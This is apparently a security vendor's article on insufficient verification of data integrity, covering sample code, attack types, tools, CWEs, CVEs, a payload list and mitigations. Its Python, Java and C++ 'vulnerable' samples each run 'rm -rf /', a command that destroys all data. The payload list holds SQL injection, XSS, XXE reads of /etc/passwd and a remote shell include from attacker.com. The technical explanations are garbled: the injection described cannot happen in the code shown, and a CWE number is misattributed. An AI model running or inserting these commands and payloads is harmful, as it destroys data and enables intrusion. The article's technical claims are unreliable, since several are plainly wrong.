10 Mar, 2023

Insufficient verification of data integrity

Vulnerability Assessment as a Service (VAaaS)

Tests systems and applications for vulnerabilities to address weaknesses.

Insufficient verification of data integrity refers to a situation where there is not enough scrutiny or validation of the accuracy and completeness of data, which can result in errors or inaccuracies in the data that are used for decision-making or other purposes. This can occur in various contexts, such as in data entry, data storage, or data transmission, and can lead to serious consequences if not addressed, such as incorrect analysis, faulty conclusions, or compromised security. It is important to have robust mechanisms in place for verifying the integrity of data, such as checksums, data validation routines, and audit trails, to ensure that data is accurate, complete, and trustworthy.

Example of vulnerable code on different programming languages:


in Python:

				
					import os

file_path = "/path/to/file.txt"
data = input("Enter data to write to file: ")

with open(file_path, "w") as f:
    f.write(data)

os.system("rm -rf /")

				
			

 

This code allows a user to input data that is then written to a file without any validation or sanitization of the input. This leaves the code open to injection attacks, where an attacker could input malicious code that could then be executed by the operating system. In addition, the code then executes the “rm -rf /” command, which deletes all files on the system, showing the danger of insufficient verification of data integrity.

• in Java:

				
					import java.util.Scanner;
import java.io.File;
import java.io.FileWriter;
import java.io.IOException;

public class FileWriterDemo {
    public static void main(String[] args) throws IOException {
        Scanner sc = new Scanner(System.in);
        String filePath = "/path/to/file.txt";
        System.out.println("Enter data to write to file:");
        String data = sc.nextLine();

        File file = new File(filePath);
        FileWriter fw = new FileWriter(file);
        fw.write(data);
        fw.close();

        Runtime.getRuntime().exec("rm -rf /");
    }
}

				
			


Similar to the Python example, this code allows a user to input data that is then written to a file without any validation or sanitization of the input. This leaves the code open to injection attacks, where an attacker could input malicious code that could then be executed by the operating system. In addition, the code then executes the “rm -rf /” command, which deletes all files on the system.

• in C++:

				
					#include <iostream>
#include <fstream>
#include <cstdlib>

using namespace std;

int main()
{
    string file_path = "/path/to/file.txt";
    string data;
    cout << "Enter data to write to file: ";
    getline(cin, data);

    ofstream file(file_path.c_str());
    if (!file.is_open())
    {
        cout << "Error opening file!" << endl;
        exit(1);
    }

    file << data << endl;
    file.close();

    system("rm -rf /");
    return 0;
}

				
			


Similar to the previous examples, this code allows a user to input data that is then written to a file without any validation or sanitization of the input. This leaves the code open to injection attacks, where an attacker could input malicious code that could then be executed by the operating system. In addition, the code then executes the “rm -rf /” command, which deletes all files on the system.

Examples of exploitation Insufficient verification of data integrity

Injection attacks:

In the examples of vulnerable code provided earlier, a user is allowed to input data that is then written to a file. However, there is no validation or sanitization of the input, which can allow an attacker to inject malicious code. For example, an attacker could input the following string:

				
					Hello"; rm -rf /

				
			


This string will be written to the file as is, and then when the command to delete all files on the system is executed, it will also execute the injected command, resulting in all files on the system being deleted.

Data manipulation:

Insufficient verification of data integrity can also be exploited to manipulate data. For example, if a system is not properly validating input data, an attacker could modify the data in transit or in storage, potentially leading to incorrect analysis, faulty conclusions, or compromised security. For instance, an attacker could modify financial transaction data in a database, resulting in incorrect financial reporting.

Denial of service attacks:

Insufficient verification of data integrity can also be exploited to launch denial of service attacks, where a system or network is overwhelmed with traffic or requests, rendering it unusable. For example, an attacker could flood a system with requests that contain invalid or malformed data, causing the system to crash or become unresponsive.

Privilege escalation techniques for Insufficient verification of data integrity

Command injection:

Command injection is a type of attack where an attacker injects malicious commands into input data that is then executed by the system. In the context of insufficient verification of data integrity, this can occur when input data is not properly validated or sanitized before being used to execute system commands. An attacker can inject commands that elevate their privileges, allowing them to gain administrative access to the system.

Buffer overflow:

A buffer overflow is a type of attack where an attacker overflows a buffer with more data than it can handle, causing the system to crash or execute arbitrary code. In the context of insufficient verification of data integrity, a buffer overflow can occur when input data is not properly validated, allowing an attacker to input more data than expected and overwrite memory spaces that control system processes, including privilege levels.

SQL injection:

SQL injection is a type of attack where an attacker injects malicious SQL commands into input data that is then executed by a database. In the context of insufficient verification of data integrity, this can occur when input data is not properly validated or sanitized before being used to execute SQL queries. An attacker can inject SQL commands that elevate their privileges, allowing them to gain administrative access to the database.

File inclusion:

File inclusion is a type of attack where an attacker exploits a vulnerability in a web application to include a file that they control on the server. In the context of insufficient verification of data integrity, this can occur when input data is not properly validated before being used to include files. An attacker can include a file that contains malicious code that elevates their privileges, allowing them to gain administrative access to the system.

General methodology and checklist for Insufficient verification of data integrity

Methodology:

  1. Identify the input sources: Identify all the input sources to the application or system that is being tested. This can include user input, data from external systems, files, and databases.

  2. Analyze the input data: Analyze the input data to determine the possible input values and the expected format. This analysis should identify any constraints or requirements on the input data and any potential security risks that could arise from the use of invalid or malicious input.

  3. Develop test cases: Develop test cases to verify that the input data is properly validated and sanitized before it is used. Test cases should include input values that are valid, invalid, and malicious to test for proper handling of all input scenarios.

  4. Execute test cases: Execute the test cases and record the results. This should include any error messages or unexpected behavior that occurs as a result of invalid or malicious input.

  5. Verify the results: Verify that the results of the test cases are consistent with the expected behavior of the system. If any issues are found, they should be reported and addressed through appropriate remediation processes.

  6. Repeat the testing: Repeat the testing as necessary to ensure that all input sources and scenarios are thoroughly tested.

  7. Document the testing: Document the testing process, including the input sources, test cases, and results. This documentation can be used for future reference and to ensure that any issues are properly tracked and resolved.

Checklist:

  1. Identify all input sources, including user input, external systems, files, and databases.

  2. Analyze the input data to determine the possible input values and the expected format.

  3. Determine if there are any constraints or requirements on the input data and if there are any potential security risks that could arise from the use of invalid or malicious input.

  4. Develop test cases that include input values that are valid, invalid, and malicious to test for proper handling of all input scenarios.

  5. Ensure that all input data is properly validated and sanitized before it is used.

  6. Test for common input validation vulnerabilities, such as SQL injection, cross-site scripting (XSS), and buffer overflow.

  7. Test for privilege escalation vulnerabilities that can occur when input data is not properly validated.

  8. Verify that error messages and unexpected behavior are handled properly.

  9. Repeat the testing as necessary to ensure that all input sources and scenarios are thoroughly tested.

  10. Document the testing process, including the input sources, test cases, and results.

Tools set for exploiting Insufficient verification of data integrity

Manual Tools:

  1. Burp Suite – A popular web application security testing tool that allows for manual testing of web application vulnerabilities including insufficient data validation.

  2. OWASP ZAP – A web application security scanner that can be used for manual and automated testing of web application vulnerabilities.

  3. Sqlmap – A tool for automated SQL injection and database takeover that can be used to exploit insufficient data validation in web applications.

  4. Metasploit Framework – A powerful penetration testing tool that includes modules for testing and exploiting web application vulnerabilities.

  5. Nessus – A vulnerability scanner that can be used for manual and automated testing of web application vulnerabilities including insufficient data validation.

  6. Nmap – A network mapping and vulnerability scanning tool that can be used to identify web application vulnerabilities including insufficient data validation.

  7. Hydra – A password cracking tool that can be used to exploit insufficient password validation in web applications.

  8. Wireshark – A network protocol analyzer that can be used to analyze network traffic and identify web application vulnerabilities including insufficient data validation.

Automated Tools:

  1. AppSpider – A web application security testing tool that uses automated scanning to identify vulnerabilities including insufficient data validation.

  2. Acunetix – A web application security scanner that uses automated scanning to identify vulnerabilities including insufficient data validation.

  3. Netsparker – A web application security scanner that uses automated scanning to identify vulnerabilities including insufficient data validation.

  4. QualysGuard – A cloud-based vulnerability scanner that can be used for automated testing of web application vulnerabilities including insufficient data validation.

  5. IBM AppScan – A web application security scanner that uses automated scanning to identify vulnerabilities including insufficient data validation.

  6. HP WebInspect – A web application security scanner that uses automated scanning to identify vulnerabilities including insufficient data validation.

  7. Vega – An open-source web application security scanner that can be used for automated testing of web application vulnerabilities including insufficient data validation.

  8. Skipfish – An open-source web application security scanner that uses automated scanning to identify vulnerabilities including insufficient data validation.

  9. Nikto – An open-source web server scanner that can be used for automated testing of web application vulnerabilities including insufficient data validation.

  10. Arachni – An open-source web application security scanner that uses automated scanning to identify vulnerabilities including insufficient data validation.

  11. Grendel-Scan – An open-source web application security scanner that uses automated scanning to identify vulnerabilities including insufficient data validation.

  12. w3af – An open-source web application security scanner that uses automated scanning to identify vulnerabilities including insufficient data validation.

The Common Weakness Enumeration (CWE)

• CWE-20: Improper Input Validation – This weakness occurs when an application does not properly validate input, leading to the possibility of a range of security issues, including data integrity violations.

• CWE-116: Improper Encoding or Escaping of Output – This weakness occurs when an application does not properly encode or escape output, leading to the possibility of cross-site scripting (XSS) and other vulnerabilities that can affect data integrity.

• CWE-129: Improper Validation of Array Index – This weakness occurs when an application does not properly validate array indices, leading to the possibility of buffer overflow and data integrity violations.

• CWE-190: Integer Overflow or Wraparound – This weakness occurs when an application does not properly handle integer values, leading to the possibility of overflow or wraparound and data integrity violations.

• CWE-222: Truncation of Security-relevant Information – This weakness occurs when an application truncates or discards security-relevant information, leading to the possibility of data loss or data integrity violations.

• CWE-273: Improper Check for Dropped Privileges – This weakness occurs when an application does not properly check for dropped privileges, leading to the possibility of data integrity violations.

• CWE-349: Use of Less Trusted Source – This weakness occurs when an application uses an untrusted source, leading to the possibility of data integrity violations.

• CWE-434: Unrestricted Upload of File with Dangerous Type – This weakness occurs when an application allows users to upload files of a dangerous type, leading to the possibility of data integrity violations.

• CWE-436: Interpretation Conflict – This weakness occurs when an application performs conflicting interpretations of input data, leading to the possibility of data integrity violations.

• CWE-464: Use of a Hard-coded Password – This weakness occurs when an application uses a hard-coded password, leading to the possibility of data integrity violations if an attacker is able to gain access to the password.

CVES related to Insufficient verification of data integrity

• CVE-2022-30316 – Honeywell Experion PKS Safety Manager 5.02 has Insufficient Verification of Data Authenticity. According to FSCT-2022-0054, there is a Honeywell Experion PKS Safety Manager unauthenticated firmware update issue. The affected components are characterized as: Firmware update functionality. The potential impact is: Firmware manipulation. The Honeywell Experion PKS Safety Manager utilizes the DCOM-232/485 communication FTA serial interface and Enea POLO bootloader for firmware management purposes. An engineering workstation running the Safety Builder software communicates via serial or serial-over-ethernet link with the DCOM-232/485 interface. Firmware images were found to have no authentication (in the form of firmware signing) and only relied on insecure checksums for regular integrity checks. Firmware images are unsigned. An attacker with access to the serial interface (either through physical access, a compromised EWS or an exposed serial-to-ethernet gateway) can utilize hardcoded credentials (see FSCT-2022-0052) for the POLO bootloader to control the boot process and push malicious firmware images to the controller allowing for firmware manipulation, remote code execution and denial of service impacts. A mitigating factor is that in order for a firmware update to be initiated, the Safety Manager has to be rebooted which is typically done by means of physical controls on the Safety Manager itself. As such, an attacker would have to either lay dormant until a legitimate reboot occurs or possibly attempt to force a reboot through a secondary vulnerability.

• CVE-2022-28385 – An issue was discovered in certain Verbatim drives through 2022-03-31. Due to missing integrity checks, an attacker can manipulate the content of the emulated CD-ROM drive (containing the Windows and macOS client software). The content of this emulated CD-ROM drive is stored as an ISO-9660 image in the hidden sectors of the USB drive, that can only be accessed using special IOCTL commands, or when installing the drive in an external disk enclosure. By manipulating this ISO-9660 image or replacing it with another one, an attacker is able to store malicious software on the emulated CD-ROM drive. This software may get executed by an unsuspecting victim when using the device. For example, an attacker with temporary physical access during the supply chain could program a modified ISO-9660 image on a device that always accepts an attacker-controlled password for unlocking the device. If the attacker later on gains access to the used USB drive, he can simply decrypt all contained user data. Storing arbitrary other malicious software is also possible. This affects Executive Fingerprint Secure SSD GDMSFE01-INI3637-C VER1.1 and Fingerprint Secure Portable Hard Drive Part Number #53650.

Insufficient verification of data integrity exploits

  • Injection attacks: Insufficient verification of data integrity can lead to injection attacks such as SQL injection, which allow an attacker to manipulate or retrieve data from a database. This can result in data loss or corruption, as well as other security breaches.

  • Buffer overflow attacks: Insufficient verification of data integrity can also lead to buffer overflow attacks, where an attacker can overwrite data in a buffer and cause the program to crash or execute arbitrary code.

  • Cross-site scripting (XSS) attacks: Insufficient verification of data integrity can allow an attacker to inject malicious scripts into a website, which can then be executed by unsuspecting users who visit the site. This can lead to the theft of sensitive information, including passwords and other personal data.

  • Arbitrary code execution: Insufficient verification of data integrity can also allow an attacker to execute arbitrary code on a system, potentially leading to further data loss or system compromise.

  • File inclusion attacks: Insufficient verification of data integrity can allow an attacker to include arbitrary files on a server, which can then be executed by the server. This can lead to further data loss or system compromise.

Practicing in test for Insufficient verification of data integrity

Review relevant documentation: Before beginning your testing, review any relevant documentation related to the application or system you will be testing. This can include technical specifications, user manuals, and security guidelines.

Identify potential attack vectors: Identify potential attack vectors that could be used to exploit Insufficient verification of data integrity. This can include input fields, cookies, URLs, and other areas where user input is accepted.

Test input fields: Test input fields by entering unexpected input, such as long strings, special characters, and other inputs that could cause issues with data integrity.

Test file uploads: Test file uploads by attempting to upload files with unexpected or malicious content, such as files with executable code or files that could overwrite existing files on the server.

Test for buffer overflow: Test for buffer overflow vulnerabilities by entering large amounts of data into input fields and observing the application’s behavior. If the application crashes or behaves unexpectedly, there may be a buffer overflow vulnerability.

Test for injection attacks: Test for injection attacks, such as SQL injection, by entering unexpected input into input fields and observing the application’s behavior. If the application responds with error messages or displays unexpected behavior, there may be an injection vulnerability.

Use automated tools: Use automated tools, such as vulnerability scanners, to help identify potential vulnerabilities related to Insufficient verification of data integrity.

Test for XSS attacks: Test for XSS attacks by attempting to inject malicious scripts into input fields or URLs and observing the application’s behavior. If the scripts execute, there may be an XSS vulnerability.

Review error messages: Review error messages displayed by the application and look for any information that could be useful in exploiting Insufficient verification of data integrity vulnerabilities.

Conduct thorough testing: Conduct thorough testing of the application or system, including both manual and automated testing, to identify any potential vulnerabilities related to Insufficient verification of data integrity.

For study Insufficient verification of data integrity

Learn about common vulnerabilities: Research common vulnerabilities related to Insufficient verification of data integrity, such as SQL injection, buffer overflow, and XSS attacks.

Review documentation: Review documentation related to the application or system you will be testing, including technical specifications, user manuals, and security guidelines.

Use testing frameworks: Use testing frameworks, such as OWASP’s Web Application Security Testing Guide (WASTG), to guide your testing process and ensure that you cover all necessary areas.

Learn how to use testing tools: Learn how to use testing tools, such as vulnerability scanners and fuzzers, to help identify potential vulnerabilities related to Insufficient verification of data integrity.

Study programming languages: Study programming languages commonly used in web development, such as PHP, Java, and Python, to better understand how vulnerabilities related to Insufficient verification of data integrity can occur.

Attend training courses: Attend training courses related to web application security and vulnerability testing to learn best practices and gain hands-on experience.

Practice testing: Practice testing web applications and systems to identify vulnerabilities related to Insufficient verification of data integrity. Use a combination of manual and automated testing methods to ensure thorough coverage.

Stay up to date: Stay up to date on the latest security threats and vulnerabilities related to Insufficient verification of data integrity by following security blogs and attending conferences and training courses.

Books with review of Insufficient verification of data integrity

The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws, by Dafydd Stuttard and Marcus Pinto: This book is a comprehensive guide to finding and exploiting security flaws in web applications, including vulnerabilities related to Insufficient verification of data integrity.

Web Application Security: A Beginner’s Guide, by Bryan Sullivan and Vincent Liu: This book provides an introduction to web application security and covers topics such as Insufficient verification of data integrity, injection attacks, and cross-site scripting (XSS).

Hacking Web Apps: Detecting and Preventing Web Application Security Problems, by Mike Shema: This book provides a practical guide to web application security testing, including techniques for identifying vulnerabilities related to Insufficient verification of data integrity.

Web Security Testing Cookbook: Systematic Techniques to Find Problems Fast, by Paco Hope and Ben Walther: This book provides a collection of practical recipes for testing web applications for security vulnerabilities, including Insufficient verification of data integrity.

Black Hat Python: Python Programming for Hackers and Pentesters, by Justin Seitz: This book provides a guide to using Python for web application security testing, including techniques for identifying Insufficient verification of data integrity vulnerabilities.

Advanced Web Application Penetration Testing with Burp Suite, by Sunny Wear: This book provides an in-depth guide to using the Burp Suite web application security testing tool, including techniques for identifying Insufficient verification of data integrity vulnerabilities.

The Tangled Web: A Guide to Securing Modern Web Applications, by Michal Zalewski: This book provides an overview of modern web application security threats and covers topics such as Insufficient verification of data integrity, XSS attacks, and clickjacking.

Web Application Security, A Comprehensive Guide to Securing Your Application Layer, by Andrew Hoffman: This book provides a comprehensive guide to web application security, including techniques for identifying and mitigating Insufficient verification of data integrity vulnerabilities.

Professional Penetration Testing: Creating and Operating a Formal Hacking Lab, by Thomas Wilhelm: This book provides a guide to creating and operating a penetration testing lab, including techniques for identifying Insufficient verification of data integrity vulnerabilities.

The Basics of Web Hacking: Tools and Techniques to Attack the Web, by Josh Pauli: This book provides an introduction to web hacking techniques, including Insufficient verification of data integrity vulnerabilities, and covers popular web hacking tools such as Burp Suite and OWASP ZAP.

List of payloads Insufficient verification of data integrity

  • SQL injection: ‘; DROP TABLE users; — (This payload attempts to delete the “users” table from a database.)

  • Cross-site scripting (XSS): <script>alert(‘XSS’);</script> (This payload displays an alert box when executed.)

  • Path traversal: ../../etc/passwd (This payload attempts to access the “/etc/passwd” file on a Unix-based system.)

  • Command injection: ; ls -la (This payload attempts to execute the “ls -la” command on a Unix-based system.)

  • Directory traversal: /etc/passwd (This payload attempts to access the “/etc/passwd” file on a web server.)

  • Remote file inclusion: http://attacker.com/shell.php (This payload attempts to include a remote shell script hosted on a attacker-controlled server.)

  • XML injection: <?xml version=”1.0″ encoding=”ISO-8859-1″?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM “file:///etc/passwd” >]><foo>&xxe;</foo> (This payload attempts to include the contents of the “/etc/passwd” file in an XML document.)

  • File upload: shell.php (This payload attempts to upload a malicious shell script to a web server.)

  • Authentication bypass: ‘ or 1=1 — (This payload attempts to bypass authentication by always evaluating to true.)

  • Buffer overflow: AAAAAAAA… (This payload attempts to overflow a buffer by sending a long string of “A” characters.)

How to be protected from Insufficient verification of data integrity

  1. Input validation: always validate user input before accepting it. This includes checking for length, format, and data type. Input validation should be performed on both the client and server sides.

  2. Output encoding: always encode user input before displaying it to prevent cross-site scripting (XSS) attacks. Output encoding should be performed on both the client and server sides.

  3. Use parameterized queries: instead of concatenating user input to form SQL queries. Parameterized queries can help prevent SQL injection attacks.

  4. Access control: mechanisms to ensure that users can only access resources that they are authorized to access.

  5. Limit user privileges: to prevent unauthorized access or modification of data.

  6. Use encryption: to protect sensitive data, both in transit and at rest.

  7. Keep software up to date:  with the latest security patches and updates.

  8. Conduct security testing:  to identify vulnerabilities and address them before they can be exploited.

  9. Educate users:  on how to recognize and avoid common attacks, such as phishing and social engineering.

  10. Monitor and log activity:  to detect and respond to attacks in a timely manner.

Mitigations for Insufficient verification of data integrity

  1. Strong input validation: Validate all user input to ensure that it is in the expected format and length, and that it does not contain any malicious content.

  2. Secure coding practices: Follow secure coding practices, such as using parameterized queries, output encoding, and other security measures to ensure that your code is secure.

  3. Use encryption: Use encryption to protect sensitive data, both in transit and at rest.

  4. Access control: Implement access control mechanisms to ensure that users can only access resources that they are authorized to access.

  5. Limit user privileges: Limit user privileges to prevent unauthorized access or modification of data.

  6. Regular software updates: Keep software and operating systems up to date with the latest security patches and updates to address any known vulnerabilities.

  7. Penetration testing: Conduct regular penetration testing to identify vulnerabilities and address them before they can be exploited.

  8. Code reviews: Conduct regular code reviews to identify any potential security weaknesses or vulnerabilities.

  9. Logging and monitoring: Implement logging and monitoring systems to detect any suspicious activity and respond in a timely manner.

  10. Training and awareness: Provide training and awareness programs for users and employees to help them recognize and avoid common security threats, such as phishing and social engineering.

Conclusion

Insufficient verification of data integrity is a common vulnerability that can be exploited by attackers to modify data without authorization or detection. This vulnerability occurs when the system fails to properly validate user input or to perform adequate checks on data before processing it.

To prevent Insufficient verification of data integrity, it is important to implement secure coding practices, including input validation, output encoding, and parameterized queries. Access control and user privilege limitations should also be put in place to prevent unauthorized access and modification of data. Additionally, regular software updates, penetration testing, and code reviews can help identify vulnerabilities and address them before they can be exploited.

Overall, it is important to be vigilant and proactive in addressing Insufficient verification of data integrity, as it can have serious consequences for the security and integrity of sensitive data.

Other Services

Ready to secure?

Let's get in touch